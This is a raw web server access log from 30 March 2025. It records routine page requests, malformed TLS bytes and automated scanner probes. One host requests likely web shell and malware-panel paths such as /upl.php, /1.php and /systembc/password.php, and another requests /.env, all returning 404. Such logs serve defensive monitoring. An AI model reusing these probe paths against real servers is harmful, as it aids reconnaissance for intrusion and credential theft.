209.160.115.4 - - [30/Mar/2025:06:39:24 +0200] "GET /index.php HTTP/1.0" 200 423 "http://triadian.castlegem.co.uk/index.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36"
18.218.39.192 - - [30/Mar/2025:06:41:46 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Chrome/126.0.0.0 Safari/537.36"
91.238.181.93 - - [30/Mar/2025:06:42:19 +0200] "\x03" 400 383 "-" "-"
18.218.39.192 - - [30/Mar/2025:06:46:38 +0200] "\x16\x03\x01" 400 383 "-" "-"
18.218.39.192 - - [30/Mar/2025:06:47:01 +0200] "" 400 383 "-" "-"
18.218.39.192 - - [30/Mar/2025:06:50:19 +0200] "\x16\x03\x01" 400 383 "-" "-"
184.105.139.68 - - [30/Mar/2025:07:19:58 +0200] "\x16\x03\x01" 400 383 "-" "-"
104.236.71.86 - - [30/Mar/2025:07:33:04 +0200] "\x16\x03\x01" 400 383 "-" "-"
104.236.71.86 - - [30/Mar/2025:07:33:04 +0200] "\x16\x03\x01" 400 383 "-" "-"
104.236.71.86 - - [30/Mar/2025:07:33:05 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
104.236.71.86 - - [30/Mar/2025:07:33:05 +0200] "GET /form.html HTTP/1.1" 404 283 "-" "curl/8.1.2"
104.236.71.86 - - [30/Mar/2025:07:33:05 +0200] "GET /upl.php HTTP/1.1" 404 282 "-" "Mozilla/5.0"
104.236.71.86 - - [30/Mar/2025:07:33:05 +0200] "GET /t4 HTTP/1.1" 404 278 "-" "Mozilla/5.0"
104.236.71.86 - - [30/Mar/2025:07:33:06 +0200] "GET /geoip/ HTTP/1.1" 404 281 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
104.236.71.86 - - [30/Mar/2025:07:33:06 +0200] "GET /favicon.ico HTTP/1.1" 404 284 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
104.236.71.86 - - [30/Mar/2025:07:33:06 +0200] "GET /1.php HTTP/1.1" 404 280 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
104.236.71.86 - - [30/Mar/2025:07:33:06 +0200] "GET /systembc/password.php HTTP/1.1" 404 291 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
104.236.71.86 - - [30/Mar/2025:07:33:07 +0200] "GET /password.php HTTP/1.1" 404 285 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
154.81.156.10 - - [30/Mar/2025:07:37:47 +0200] "GET / HTTP/1.1" 200 423 "-" "-"
185.242.226.116 - - [30/Mar/2025:07:38:21 +0200] "\x16\x03\x01" 400 383 "-" "-"
195.211.191.127 - - [30/Mar/2025:07:43:09 +0200] "GET /.env HTTP/1.1" 404 280 "-" "Mozilla/5.0 (X11; CrOS x86_64 11647.154.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.114 Safari/537.36"
